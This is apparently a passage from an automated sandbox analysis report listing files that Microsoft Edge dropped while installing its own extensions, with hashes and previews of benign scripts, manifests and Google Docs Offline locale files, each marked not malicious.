                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_1377315504\CRX_INSTALL\content.js

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_1377315504\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_1377315504\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_1377315504\dae90165-80eb-4d03-b991-23e3b678ceb1.tmp

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\128.png

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

